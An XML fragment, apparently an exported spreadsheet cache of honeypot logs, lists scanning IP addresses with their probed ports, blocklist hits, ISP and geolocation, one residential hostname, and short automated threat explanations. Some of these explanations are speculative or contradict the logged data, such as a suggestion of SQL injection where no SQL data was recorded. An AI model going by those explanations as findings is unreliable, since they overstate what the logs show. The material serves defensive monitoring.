    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="104"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79ba:afd7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="129"/>
    <x v="129"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:41:54"/>
    <d v="2025-04-29T21:34:12"/>
    <d v="2025-04-30T15:41:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:13a7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="130"/>
    <x v="130"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:39:59"/>
    <d v="2024-07-08T18:02:00"/>
    <d v="2025-04-30T15:39:59"/>
    <n v="90"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5764&amp;&amp;3306&amp;&amp;35135&amp;&amp;7226&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="112"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2004-09-21"/>
    <s v="CableLite"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.120,49717)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.120,52931)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca53:1378"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to perform a reconnaissance of the network and identify potential vulnerabilities. They are scanning for various services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. &amp;&amp; MySQL database attempted unauthorized access, potentially for password cracking or data exfiltration. The attempt may be part of a larger malicious campaign to breach database security. This could indicate a scanning activity by an attacker."/>
    <s v=" "/>
  </r>
  <r>
    <x v="131"/>
    <x v="131"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:28:48"/>
    <d v="2024-06-18T07:06:38"/>
    <d v="2025-04-30T15:28:48"/>
    <n v="354"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Credential_Stuffing_Attack_High"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_NTP_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_REDIS_H1&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SMB_H47&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_NTP_H21&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SIP_H33&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H20&amp;&amp;SMA-LAB_SNMP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_FTP_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;161&amp;&amp;80&amp;&amp;389&amp;&amp;54968&amp;&amp;1521&amp;&amp;143&amp;&amp;1433&amp;&amp;22&amp;&amp;55712&amp;&amp;6379&amp;&amp;3389&amp;&amp;5432&amp;&amp;NA&amp;&amp;23&amp;&amp;9100&amp;&amp;110&amp;&amp;1521&amp;&amp;6379&amp;&amp;57994&amp;&amp;9100&amp;&amp;21&amp;&amp;1521&amp;&amp;6379&amp;&amp;23549&amp;&amp;1080&amp;&amp;9100&amp;&amp;25&amp;&amp;5432&amp;&amp;445&amp;&amp;26231&amp;&amp;51228&amp;&amp;52336&amp;&amp;443&amp;&amp;50995&amp;&amp;55362&amp;&amp;52865&amp;&amp;5900&amp;&amp;3306&amp;&amp;55463&amp;&amp;54696&amp;&amp;63598&amp;&amp;55073&amp;&amp;51235&amp;&amp;51098&amp;&amp;55747&amp;&amp;57045&amp;&amp;54858"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="138"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash&amp;&amp;request&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FaPEhwiiL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=afluBe'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lcHnFpgRB'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VIAteG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iiozgR'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,61520)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,61522)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,59602)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,59604)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.82,59616)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JFglCIKOw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HGAbLp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dwRJMY'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nAYcKDzKr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mJNQDK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lccQEG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LMHVWEyfW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ulpiJH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SMKeIy'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8452"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="No login attempt was made via this service, as indicated by 'NA' for Data_TELNET. This might be an idle or unutilized connection. No malicious activity is evident from the log entry itself. &amp;&amp; The system has been accessed, possibly using SQL injection or exploitation of a vulnerability, as it is checking for MySQL access attempts. _x000a_An attacker may be trying to gain unauthorized access to the database._x000a_This could be an attempt to extract sensitive information. &amp;&amp; This log indicates a potential probing or reconnaissance activity, where an attacker is attempting to gather information about the available services on a target system. The specific command 'CAPABILITY' suggests that the attacker is trying to determine what features and options are supported by the service. This could be a precursor to further exploitation or malicious activity."/>
    <s v="SQL Scan &amp;&amp; Scanning Probe"/>
  </r>
  <r>
    <x v="132"/>
    <x v="132"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:27:19"/>
    <d v="2025-03-04T15:49:15"/>
    <d v="2025-04-30T15:27:19"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H30"/>
    <s v="1433&amp;&amp;34229&amp;&amp;61632&amp;&amp;445&amp;&amp;61786&amp;&amp;61935&amp;&amp;61929&amp;&amp;61640&amp;&amp;62149"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Hakim Sabzevar University"/>
    <s v="2001-04-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (217.219.246.51,55059)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d9db:f633"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="An unknown device has connected to a shared resource from an IP address associated with malicious activity. This indicates potential unauthorized access or data exfiltration via this compromised connection. Further investigation is required to determine the full extent of the threat. &amp;&amp; Possible malicious activity detected: an incoming connection was made from a suspicious IP address to the SMB service. This could be indicative of unauthorized access or reconnaissance attempts by attackers. The source IP 217.219.246.51 is attempting to connect on port 55059."/>
    <s v="SMB Scanning &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="133"/>
    <x v="133"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:26:08"/>
    <d v="2025-04-30T15:26:08"/>
    <d v="2025-04-30T15:26:08"/>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d1:621d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="134"/>
    <x v="134"/>
    <s v="NA&amp;&amp;pool-162-83-233-137.nycmny.fios.verizon.net"/>
    <x v="0"/>
    <d v="2025-04-30T15:11:12"/>
    <d v="2025-03-17T06:02:48"/>
    <d v="2025-04-30T15:11:12"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Westchester"/>
    <s v="Yonkers"/>
    <s v="5145215"/>
    <s v="10710"/>
    <s v="40.9312"/>
    <s v="-73.8988"/>
    <s v="701"/>
    <s v="Verizon Business"/>
    <s v="Verizon Business"/>
    <s v="residential"/>
    <s v="Verizon Internet Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a253:e989"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="135"/>
    <x v="135"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:11:08"/>
    <d v="2024-04-02T01:29:00"/>
    <d v="2025-04-30T15:11:08"/>
    <n v="132"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1433&amp;&amp;49274&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Jung-gu"/>
    <s v="Jung-gu"/>
    <s v="1845068"/>
    <s v="301131"/>
    <s v="37.5601"/>
    <s v="126.996"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:799f:3583"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unknown activity detected on TELNET service, possibly due to lack of incoming connections. No malicious traffic reported so far, but potential vulnerabilities exist. Normal operation assumed for now."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="136"/>
    <x v="136"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:10:38"/>
    <d v="2024-05-04T05:56:00"/>
    <d v="2025-04-30T15:10:38"/>
    <n v="95"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;51692&amp;&amp;445&amp;&amp;1433&amp;&amp;NA&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="02"/>
    <s v="Māzandarān"/>
    <s v="NA"/>
    <s v="Bābolsar"/>
    <s v="142358"/>
    <s v="NA"/>
    <s v="36.6993"/>
    <s v="52.6501"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="TCI(Mazandaran)"/>
    <s v="business"/>
    <s v="Telecommunication Company of Mazandaran"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56709)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56928)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56952)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,57055)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,55604)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,19771)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,46397)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,65092)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 